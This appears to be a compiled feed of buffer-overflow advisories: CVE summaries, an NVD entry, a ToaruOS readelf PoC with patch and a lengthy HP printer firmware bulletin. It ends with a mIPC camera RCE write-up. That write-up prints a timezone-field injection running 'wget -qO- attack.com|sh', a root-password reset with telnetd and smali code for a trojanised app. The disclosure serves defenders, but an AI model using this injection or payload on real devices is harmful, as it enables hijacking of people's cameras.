A vulnerability was found in Sony PS4 and PS5. It has been classified as critical. This affects the function UVFAT_readupcasetable of the component exFAT Handler. The manipulation of the argument dataLength leads to heap-based buffer overflow. It is possible to launch the attack on the physical device. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-209679.

CVE-2022-3349

Stack-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.0598.

CVE-2022-3324

A stack-based buffer overflow vulnerability was found on Western Digital My Cloud Home, My Cloud Home Duo, and SanDisk ibi that could allow an attacker accessing the system locally to read information from /etc/version file. This vulnerability can only be exploited by chaining it with another issue. If an attacker is able to carry out a remote code execution attack, they can gain access to the vulnerable file, due to the presence of insecure functions in code. User interaction is required for exploitation. Exploiting the vulnerability could result in exposure of information, ability to modify files, memory access errors, or system crashes.

**Description**

A stack-based buffer overflow vulnerability was found on Western Digital My Cloud Home, My Cloud Home Duo, and SanDisk ibi that could allow an attacker accessing the system locally to read information from /etc/version file. This vulnerability can only be exploited by chaining it with another issue. If an attacker is able to carry out a remote code execution attack, they can gain access to the vulnerable file, due to the presence of insecure functions in code. User interaction is required for exploitation. Exploiting the vulnerability could result in exposure of information, ability to modify files, memory access errors, or system crashes.

  

**Severity** 

**CVSS 3.x Severity and Metrics:**

  

**NIST:** NVD

**Base Score:**  N/A

NVD score not yet provided.

  

**CNA:**  Western Digital

**Vector:**  CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:L/I:N/A:N

_NVD Analysts use publicly available information to associate vector strings and CVSS scores. We also display any CVSS information provided within the CVE List from the CNA._

_Note: NVD Analysts have not published a CVSS score for this CVE at this time. NVD Analysts use publicly available information at the time of analysis to associate CVSS vector strings. A CNA provided score within the CVE List has been displayed._

**References to Advisories, Solutions, and Tools**

By selecting these links, you will be leaving NIST webspace. We have provided these links to other web sites because they may have information that would be of interest to you. No inferences should be drawn on account of other sites being referenced, or not, from this page. There may be other web sites that are more appropriate for your purpose. NIST does not necessarily endorse the views expressed, or concur with the facts presented on these sites. Further, NIST does not endorse any commercial products that may be mentioned on these sites. Please address comments about this page to nvd@nist.gov.

Hyperlink

Resource

https://nvd.nist.gov/vuln/detail/CVE-2022-23006

**Weakness Enumeration**

CWE-ID

CWE Name

Source

CWE-121

Stack-based Buffer Overflow

 Western Digital  

**Change History**

0 change records found show changes

CVE-2022-23006: NVD - CVE-2022-23006

readelf in ToaruOS 2.0.1 has a global overflow allowing RCE when parsing a crafted ELF file.

Hi,

readelf in ToaruOS 2.0.1 has a global overflow allowing RCE when parsing a crafted ELF file. Through elaborately constructed elf files, remote code execution can be realized.

PoC

./readelf -d poc\_elf\_overflow

Dynamic section at offset 0x2df8 contains (up to) 30 entries:
  Tag        Type                         Name/Value
zsh: segmentation fault  ./readelf -d poc\_elf\_overflow

poc\_elf\_overflow.zip

Patch

$ git diff                                        
diff --git a/apps/readelf.c b/apps/readelf.c
index ce25d5e1..91f5e722 100644
\--- a/apps/readelf.c
+++ b/apps/readelf.c
@@ -168,7 +168,7 @@ static char \* dynamicTagToStr(Elf64\_Dyn \* dynEntry, char \* dynstr) {
                        break;
                case DT\_NEEDED:
                        name = "(NEEDED)";
\-                       sprintf(extra, "\[shared lib = %s\]", dynstr + dynEntry->d\_un.d\_val);
+                       snprintf(extra, 500, "\[shared lib = %s\]", dynstr + dynEntry->d\_un.d\_val);
                        break;
                case DT\_PLTRELSZ:
                        name = "(PLTRELSZ)";
@@ -286,7 +286,7 @@ static char \* dynamicTagToStr(Elf64\_Dyn \* dynEntry, char \* dynstr) {
                        break;
        }
 
\-       sprintf(buf,"%-15s %s", name, extra);
+       snprintf(buf, 1024, "%-15s %s", name, extra);
        return buf;
 }

CVE-2022-38932: Buffer overflow causing RCE in readelf  · Issue #243 · klange/toaruos

This advisory contains mitigations for a Heap-based Buffer Overflow vulnerability in Rockwell Automation ThinManager ThinServer, a thin client and remote desktop protocol (RDP) server management software.

Rockwell Automation ThinManager ThinServer

Heap buffer overflow in Exosphere in Google Chrome on Chrome OS, Lacros prior to 105.0.5195.52 allowed a remote attacker who convinced a user to engage in specific UI interactions to potentially exploit heap corruption via crafted UI interactions.

CVE-2022-3051

Heap buffer overflow in Screen Capture in Google Chrome on Chrome OS prior to 105.0.5195.52 allowed a remote attacker who convinced a user to engage in specific UI interactions to potentially exploit heap corruption via a crafted HTML page.

CVE-2022-3043

Heap buffer overflow in Internals in Google Chrome prior to 105.0.5195.125 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

CVE-2022-3200

Certain HP Print Products are potentially vulnerable to Buffer Overflow.

**hp-concentra-wrapper-portlet**

 Actions

Certain HP Print Products are potentially vulnerable to Buffer Overflow and/or Remote Code Execution.

Severity

Critical

HP Reference

HPSBPI03810 rev. 1

Release date

September 21, 2022

Last updated

September 21, 2022

Category

Print

Potential Security Impact

Potential Buffer Overflow, Remote Code Execution

**Relevant Common Vulnerabilities and Exposures (CVE) List**

List of CVE IDs    

CVE ID

CVSS

Severity

Vector

CVE-2022-28721

9.8

Critical

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2022-28722

7.1

High

CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

PSR-2022-0021

**Resolution**

Update your printer firmware.

HP has provided firmware updates for potentially affected products listed in the table below. To obtain the updated firmware listed below, go to the HP Software and Driver Downloads, and then search for your printer model.

**Affected products**

Find the products affected and the firmware version that resolves the vulnerabilities.

**HP inkjet printers**

Review the table for affected HP inkjet printers, and the updated firmware version.

Affected products     

Product Name

Product Number

CVE-2022-28721 (CVSS 9.8)

CVE-2022-28722 (CVSS 7.3)

Updated Firmware Version

HP DeskJet Ink Advantage 5000 All-in-One Printer series

M2U86A, M2U86B, M2U86C, M2U87A, M2U87B, M2U88B, M2U89B

Affected

Not Affected

2211A or higher

HP DeskJet Ink Advantage 5200 All-in-One Printer series

M2U76A, M2U77A

Affected

Not Affected

2211C or higher

HP DeskJet Plus Ink Advantage 6000 All-in-One Printer series

5SE522A

Affected

Not Affected

001.2214A or higher

HP DeskJet Plus Ink Advantage 6400 All-in-One Printer series

5SD78A, 5SD79A

Affected

Not Affected

001.2214A or higher

HP ENVY 5000 All-in-One Printer series

M2U85B, Z4A59A, Z4A71A, M2U91B, Z4A69A, M2U92B, Z4A70A, M2U94B, Z4A73A, Z4A74A, M2U91A, M2U92A, M2U85A, M2U94A, Z4A54A, Z4A60A, Z4A61A, Z4A61B

Affected

Not Affected

2211C or higher

HP ENVY 6000 All-in-One Printer series

5SE17A, 6WD35A, 7CZ37A, 5SE18A, 5SE16A, 5SE19A, 5SE20A, 8QQ97A, 8QQ98A, 8QQ99A

Affected

Not Affected

001.2214B or higher

HP ENVY 6000e All-In-One Printer series

223N6A, 2K4V8A, 2K4W1A, 2K4W2A, 223N2A, 223N1A, 223N5A, 223N9A

Affected

Not Affected

001.2216A or higher

HP ENVY 6400e All-In-One Printer series

223R6A, 2K5L5A, 223R2A, 223R1A, 223R3A, 223R9A

Affected

Not Affected

001.2216A or higher

HP ENVY Photo 6200 All-in-One Printer series

K7G22A, K7G18A, K7G23A, Y0K15A, K7D05A

Affected

Not Affected

003.2220B or higher

HP ENVY Photo 7100 All-in-One Printer series

Z3M37A, K7G93A, Z3M52A, 3XD89A, K7G95A, K7G96A, K7G99A

Affected

Not Affected

003.2220B or higher

HP ENVY Photo 7800 All-in-One Printer series

K7R96A, K7S00A, K7S08A, K7S01A

Affected

Not Affected

003.2220B or higher

HP ENVY Pro 6400 All-in-One Printer series

5SE46A, 6WD14A, 6WD16A, 5SE47A, 5SE45A, 5SE48A, 7XK12A, 5SE50A, 8QQ86A, 8QQ87A, 8QQ88A

Affected

Not Affected

001.2214B or higher

HP OfficeJet 5200 All-in-One Printer series

M2U81A, Z4B29A, M2U81B, Z4B27A, M2U82B, Z4B28A, M2U84B, M2U82A, M2U75A, M2U84A, Z4B12A, Z4B13A, Z4B14A, Z4B18A

Affected

Not Affected

2211A or higher

HP OfficeJet 6950 All-in-One Printer series

P4C78A, P4C85A, T3P03A, P4C86A, P4C81A, P4C82A, P4C84A

Affected

Affected

001.2224A or higher

HP OfficeJet 6960 All-in-One Printer series

T0G25A, T0G26A

Affected

Affected

001.2225A or higher

HP OfficeJet 8010 All-in-One Printer series

1KR69A, 1KR58A

Affected

Not Affected

001.2213A or higher

HP OfficeJet 8010e All-in-One Printer series

228F5A

Affected

Not Affected

004.2222A or higher

HP OfficeJet 8022 All-in-One Printer

3UC65A

Affected

Not Affected

001.2213A or higher

HP OfficeJet 8022e All-in-One Printer

1K7K6A

Affected

Not Affected

004.2222A or higher

HP OfficeJet Pro 6960 All-in-One Printer series

J7K33A, T0F30A, T0F32A, T0F38A, T0F31A, J7K37A, J7K38A, J7K35A, J7K39A, T0F28A, T0F36A

Affected

Affected

001.2225A or higher

HP OfficeJet Pro 6970 All-in-One Printer series

J7K34A, T0F33A, T0F39A, T0F34A, T0F35A, J7K40A, J7K36A, J7K42A, J7K41A, T0F29A, T0F37A, T0F40A

Affected

Affected

001.2225A or higher

HP OfficeJet Pro 7720 Wide Format All-in-One Printer series

G5J56A, Y0S18A

Affected

Affected

003.2226A or higher

HP OfficeJet Pro 7730 Wide Format All-in-One Printer

L3T99A, Y0S19A

Affected

Affected

003.2226A or higher

HP OfficeJet Pro 7740 Wide Format All-in-One Printer series

G5J38A, T1P99A

Affected

Affected

002.2226A or higher

HP OfficeJet Pro 8020 All-in-One Printer series

1KR62A, 5LJ17A, 5LJ18A, 5LJ19A, 1KR57A, 1KR61A

Affected

Not Affected

001.2213A or higher

HP OfficeJet Pro 8020e All-in-One Printer series

1K7K7A

Affected

Not Affected

004.2222A or higher

HP OfficeJet Pro 8030 All-in-One Printer series

1KR62A, 5LJ17A, 5LJ18A, 5LJ19A, 1KR57A, 1KR61A, 3UC64A

Affected

Not Affected

001.2213A or higher

HP OfficeJet Pro 8030e All-in-One Printer series

5LJ14A, 5LJ15A, 5LJ16A, 3UC66A, 4KJ65A, 5LJ23A

Affected

Not Affected

004.2222A or higher

HP OfficeJet Pro 8035e All-in-One Printer

1L0H6A, 1L0H7A, 1L0H8A

Affected

Not Affected

004.2222A or higher

HP OfficeJet Pro 8210 Printer series

D9L63A, D9L64A, J3P65A, J3P66A, J3P67A, J3P68A, T0G70A

Affected

Affected

001.2225B or higher

HP OfficeJet Pro 8710 All-in-One Printer series

D9L18A, M9L66A, M9L67A, T0G46A, J6X76A, J6X78A, J6X80A, K7S37A, M9L70A, J6X77A, J6X81A, J6X79A, K7S38A, T0G47A, T0G48A, T0G49A, M9L65A

Not Affected

Affected

001.2224B or higher

HP OfficeJet Pro 8730 All-in-One Printer

D9L20A, K7S32A

Affected

Affected

001.2225B or higher

HP OfficeJet Pro 8740 All-in-One Printer series

D9L21A, K7S42A, T0G65A, K7S39A, J6X83A, K7S43A, K7S40A, K7S41A

Affected

Affected

001.2225B or higher

HP OfficeJet Pro 9010 All-in-One Printer series

1KR46A, 3UK83A, 1KR49A, 1KR42A, 1KR45A, 3UK84A, 1KR48A, 1KR54A, 1KR55A

Affected

Not Affected

002.2211C or higher

HP OfficeJet Pro 9010e All-in-One Printer series

257G3A

Affected

Not Affected

005.2210A or higher

HP OfficeJet Pro 9020 All-in-One Printer series

1MR78A, 1MR66A, 1MR67A, 1MR69A, 1MR70A, 1MR71A, 1MR72A, 1MR73A, 1MR74A, 1MR75A, 1MR76A, 1MR77A, 1MR68A, 1MR79A

Affected

Not Affected

002.2211C or higher

HP OfficeJet Pro 9020e All-in-One Printer series

226Y9A, 1G5M0A

Affected

Not Affected

005.2210A or higher

HP Smart Tank 510 Wireless All-in-One series / HP Smart Tank Plus 550 Wireless All-in-One series

4SB23A, 3YW71A, 3YW74A, 1TJ09A, 3YW70A, 1TJ10A, 1TJ11A, 3YW73A, 6HF11A, 1TJ12A, 3YW72A, 3YW75A

Affected

Not Affected

001.2219A or higher

HP Smart Tank 610 Wireless All-in-One series / HP Smart Tank Plus 650 Wireless All-in-One series

Y0F71A, Y0F72A, Y0F73A, 7XV38A, Y0F74A, 3YW48A, 3YW51A

Affected

Not Affected

001.2219A or higher

HP Tango / HP Tango X

3DP64A, 3DP65A, 3DP66A, 3YF56A, 3YF57A, 3YF58A, 3YF60A, 3YF61A, 2RY54A, 2RY55A, 2RY56A, 3YF65A, 3YF66A, 3YF67A, 3YF68A, 3YF69A, 3YF70A, 3YF59A

Affected

Not Affected

2209A or higher

**HP LaserJet Pro printers**

Review the table for affected HP LaserJet Pro printers, and the updated firmware version.

Affected products     

Product Name

Product Number

CVE-2022-28721 (CVSS 9.8)

CVE-2022-28722 (CVSS 7.3)

Updated Firmware Version

HP Color LaserJet MFP M478-M479 series

W1A75A, W1A76A, W1A77A, W1A81A, W1A82A, W1A79A, W1A80A, W1A78A

Affected

Not Affected

002\_2208A or higher

HP Color LaserJet Pro M453-M454 series

W1Y40A, W1Y41A, W1Y46A, W1Y47A, W1Y44A, W1Y45A, W1Y43A

Affected

Not Affected

002\_2208A or higher

HP LaserJet Pro M304-M305 Printer series

W1A66A, W1A46A, W1A47A, W1A48A

Affected

Not Affected

002\_2208A or higher

HP LaserJet Pro M404-M405 Printer series

W1A51A, W1A53A, W1A56A, W1A63A, W1A52A, 93M22A, W1A58A, W1A59A, W1A60A, W1A57A

Affected

Not Affected

002\_2208A or higher

HP LaserJet Pro MFP M428-M429 f series

W1A29A, W1A32A, W1A30A, W1A38A, W1A34A, W1A35A

Affected

Not Affected

002\_2208A or higher

HP LaserJet Pro MFP M428-M429 series

W1A28A, W1A31A, W1A33A

Affected

Not Affected

002\_2208A or higher

**HP PageWide Pro printers**

Review the table for affected HP PageWide Pro printers, and the updated firmware version.

Affected products     

Product Name

Product Number

CVE-2022-28721 (CVSS 9.8)

CVE-2022-28722 (CVSS 7.3)

Updated Firmware Version

HP PageWide 352dw Printer

J6U57A

Affected

Affected

2228B or higher

HP PageWide 377dw Multifunction Printer

J9V80A

Affected

Affected

2228B or higher

HP PageWide Managed P55250dw Printer series

J6U55A, J6U51B, J6U55B

Affected

Affected

2228B or higher

HP PageWide Managed P57750dw Multifunction Printer

J9V82A

Affected

Affected

2228B or higher

HP PageWide Managed P75050dn/dw

W1B28A, Y3Z45A W1B29A, Y3Z47A

Affected

Affected

006.2225A or higher

HP PageWide Managed P77740dn Multifunction Printer

Y3Z57A

Affected

Affected

006.2225A or higher

HP PageWide Managed P77740dw Multifunction Printer

W1B33A

Affected

Affected

006.2225A or higher

HP PageWide Managed P77740z Multifunction Printer

W1B39A

Affected

Affected

006.2225A or higher

HP PageWide Managed P77750z Multifunction Printer

W1B37A

Affected

Affected

006.2225A or higher

HP PageWide Managed P77760z Multifunction Printer

W1B38A

Affected

Affected

006.2225A or higher

HP PageWide Pro 452dn Printer series

D3Q15A

Affected

Affected

2228B or higher

HP PageWide Pro 452dw Printer series

D3Q16A

Affected

Affected

2228B or higher

HP PageWide Pro 477dn Multifunction Printer series

D3Q19A

Affected

Affected

2228B or higher

HP PageWide Pro 477dw Multifunction Printer series

D3Q20A

Affected

Affected

2228B or higher

HP PageWide Pro 552dw Printer series

D3Q17A

Affected

Affected

2228B or higher

HP PageWide Pro 577 Multifunction Printer series

D3Q21A, K9Z76A

Affected

Affected

2228B or higher

HP PageWide Pro 750dn Printer

Y3Z44A

Affected

Affected

006.2225A or higher

HP PageWide Pro 750dw Printer

A7W93A, Y3Z46A

Affected

Affected

006.2225A or higher

HP PageWide Pro 772dn Multifunction Printer

Y3Z54A

Affected

Affected

006.2225A or higher

HP PageWide Pro 772dw Multifunction Printer

W1B31A

Affected

Affected

006.2225A or higher

**Revision history**

This document has been revised according to the information below.

List of versions   

Version

Description

Date

1

Initial Release

September 21, 2022

**Additional information**

Follow these links for additional information.

Third-party security patches

Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support

For issues about implementing the recommendations of this Security Bulletin, visit http://www.hp.com/go/contacthp to learn about your HP support options.

Report

To report a potential security vulnerability with any HP supported product, send email to: hp-security-alert@hp.com.

Subscribe

To initiate a subscription to receive future HP Security Bulletin alerts via email, visit https://h41369.www4.hp.com/alerts-signup.php?lang=en&cc=US&jumpid=hpsc\_profile.

Security bulletin archive

To view released Security Bulletins, visit https://support.hp.com/security-bulletins.

It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.

Download HP’s security-alert PGP key

**Legal information**

System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.

HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Security Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Security Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement.

© Copyright 2022 HP Development Company, L.P.

HP Inc. (HP) shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP nor its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. "HP Inc.," "HP" and the names of HP products referenced herein are trademarks of HP Inc. or its affiliates in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.

CVE-2022-28722: Certain HP Print Products - Potential Buffer Overflow, Remote Code Execution

Unsanitized input when setting a locale file leads to shell injection in mIPC camera firmware 5.3.1.2003161406. This allows an attacker to gain remote code execution on cameras running the firmware when a victim logs into a specially crafted mobile app.

\# mIPC firmware RCE By Joshua Wang Firmware version: v5.3.1.2003161406 (latest?) ## Overview Unsanitized input when setting a \`UTC(\\+|\\-).\*\` locale file leads to shell injection. A stack-based buffer overflow also exists. This allows an attacker to gain remote code execution, but requires the attacker to be authenticated in the mobile application to interface with the camera running mIPC. ## Vulnerability After receiving a firmware dump of a Lefun camera, which runs mIPC firmware, I noted the following in the startup process: - telnetd is killed - the root password is randomized and effectively un-bruteforceable I turned to searching through the mIPC binary for calls to \`system\`, looking for possible injections. The mIPC mobile application allows one to choose the timezone that the camera's system should operate with. I believe this is used for the on-screen display's time feature. One thing that stood out to me is that the firmware dump also included various different locale files for setting a timezone. \`\`\` ./backupfs/apps/app/ipc/data/cfg/zoneinfo/ ├── UTC+00\_00 ├── UTC+01\_00 ├── UTC-01\_00 ├── UTC+02\_00 ├── UTC-02\_00 ├── UTC+03\_00 ├── UTC-03\_00 ├── UTC+03\_30 ├── UTC-03\_30 ├── UTC+04\_00 ├── UTC-04\_00 ├── UTC+04\_30 ├── UTC-04\_30 ├── UTC+05\_00 ├── UTC-05\_00 ├── UTC+05\_30 ├── UTC+05\_45 ├── UTC+06\_00 ├── UTC-06\_00 ├── UTC+06\_30 ├── UTC+07\_00 ├── UTC-07\_00 ├── UTC+08\_00 ├── UTC-08\_00 ├── UTC+09\_00 ├── UTC-09\_00 ├── UTC+09\_30 ├── UTC-09\_30 ├── UTC+10\_00 ├── UTC-10\_00 ├── UTC+10\_30 ├── UTC+11\_00 ├── UTC-11\_00 ├── UTC+12\_00 ├── UTC+13\_00 └── UTC+14\_00 \`\`\` The vulnerable function is found at offset \`0x0013e91c\`. I re-labeled and re-typed the decompilation in Ghidra. \`\`\`c int choose\_utc\_timezone(undefined4 param\_1,char \*param\_2) { int iVar1; char \*pcVar2; char acStack192 \[128\]; char acStack64 \[40\]; if (param\_2 == (char \*)0x0) { iVar1 = -1; } else { strcpy(acStack64,param\_2); pcVar2 = strchr(acStack64,0x3a); if (pcVar2 != (char \*)0x0) { \*pcVar2 = '\_'; } iVar1 = access("/etc/TZ",0); if (iVar1 == 0) { sprintf(acStack192, "cp ../../../apps/app/ipc/data/cfg/zoneinfo/%s /etc/TZ; cp /etc/TZ ../data/; ", acStack64); system(acStack192); } else { sprintf(acStack192, "cp ../../../apps/app/ipc/data/cfg/zoneinfo/%s /etc/localtime; cp /etc/localtime ../ data/; " ,acStack64); system(acStack192); iVar1 = 0; } } return iVar1; } \`\`\` It appears that the name of a timezone filename is passed in through \`param\_2\`. It is then strcpy'd to \`acStack64\`. Then, it is formatted into a shell command using \`sprintf\` and then passed to \`system\`. The command copies a selected locale file from the previously mentioned directory into \`/etc/TZ\`, effectively setting the locale. It is important to note that mIPC by default uses another method to set a timezone besides copying a locale file, but these were not (to my knowledge) vulnerable due to sanitization. In this function, we can see two vulnerabilities. First, the \`strcpy\` allows us to copy more than 40 bytes into \`acStack64\`. One may argue that a length check occurred outside of this function, but I verified it experimentally and it indeed crashed the binary. Second, we can command-inject our way into the system! We just need our input to start with a valid locale filename (\`UTC+01\_00\`, etc) in order for the binary to reach this function (I also verified this experimentally). I could not find the parent calling function, but it may be that the developer used a \`strncmp\` and only verified the first couple bytes of input to match a valid locale filename. ## Exploitation I decided to exploit the command injection. Using APKtool, I dumped the mIPC mobile application and reverse engineered the behavior that sets timezones. I first instantiated a \`mcld\_ctx\_time\_set\` object. The definition for it: \`\`\` .class public Lcom/mining/cloud/bean/mcld/mcld\_ctx\_time\_set; .super Lcom/mining/cloud/bean/mcld/mcld\_ctx; .source "mcld\_ctx\_time\_set.java" # instance fields .field public auto\_sync:I .field public day:I .field public hour:I .field public min:I .field public mon:I .field public ntp\_addr:Ljava/lang/String; .field public sec:I .field public timezone:Ljava/lang/String; .field public type:Ljava/lang/String; .field public year:I # direct methods .method public constructor <init>()V .locals 0 .line 6 invoke-direct {p0}, Lcom/mining/cloud/bean/mcld/mcld\_ctx;-><init>()V return-void .end method \`\`\` The locale filename (\`param\_2\`) is expected in the \`timezone\` field. Because of the buffer overflow, we are constrainted to < 40 characters in this injection, including the bytes at the beginning for a valid locale filename. Otherwise, we will crash the mIPC binary. To circumvent this, I decided to host my actual payload on a remote server, and execute it by calling \`wget\` and piping the output into \`sh\`. This gives me unlimited access to the shell. I set: - type == \`NTP\` - timezone == \`UTC+01\_00;wget -qO- attack.com|sh #\` - auto\_sync = 1 - sn == a serial number I got from calling \`McldActivityLivePlay->mSerialNumber\` - handler == \`McldActivityLivePlay->customTimeSetHandler\` I then invoked \`mcld\_agent->time\_set\` with this object and a couple other retrieved configurations to set the locale. See \[here\](#Full-payload) for the full thing. My remote payload just consisted of changing the root password with \`echo "root:root" | chpasswd\` and starting telnetd. Recall that the root password is randomized on startup. To make it easier for my coworker, Chris, to collect data (we were remote), I embedded my exploit into the \`onCreate\` method of the \`McIdActivityLivePlay\` class. This meant as soon as someone views the camera, the attack is run. I re-compiled the application with apktool, signed it, and installed it via ADB. !\[\](https://i.imgur.com/fBdlPHf.png) ## Full payload I learned way too much about Dalvik. \`\`\` new-instance v1, Lcom/mining/cloud/bean/mcld/mcld\_ctx\_time\_set; invoke-direct {v1}, Lcom/mining/cloud/bean/mcld/mcld\_ctx\_time\_set;-><init>()V const-string v2, "NTP" iput-object v2, v1, Lcom/mining/cloud/bean/mcld/mcld\_ctx\_time\_set;->type:Ljava/lang/String; const-string v2, "UTC+01\_00;wget -qO- attack.com|sh #" iput-object v2, v1, Lcom/mining/cloud/bean/mcld/mcld\_ctx\_time\_set;->timezone:Ljava/lang/String; const/4 v2, 0x1 iput v2, v1, Lcom/mining/cloud/bean/mcld/mcld\_ctx\_time\_set;->auto\_sync:I iget-object v2, p0, Lcom/mining/cloud/activity/McldActivityLivePlay;->mSerialNumber:Ljava/lang/String; iput-object v2, v1, Lcom/mining/cloud/bean/mcld/mcld\_ctx\_time\_set;->sn:Ljava/lang/String; iget-object v2, p0, Lcom/mining/cloud/activity/McldActivityLivePlay;->customTimeSetHandler:Landroid/os/Handler; iput-object v2, v1, Lcom/mining/cloud/bean/mcld/mcld\_ctx\_time\_set;->handler:Landroid/os/Handler; iget-object v3, p0, Lcom/mining/cloud/activity/McldActivityLivePlay;->mApp:Lcom/mining/cloud/application/McldApp; iget-object v3, v3, Lcom/mining/cloud/application/McldApp;->mAgent:Lcom/mining/cloud/mcld\_agent; invoke-virtual {v3, v1}, Lcom/mining/cloud/mcld\_agent;->time\_set(Lcom/mining/cloud/bean/mcld/mcld\_ctx\_time\_set;)V \`\`\`

Tag

#buffer_overflow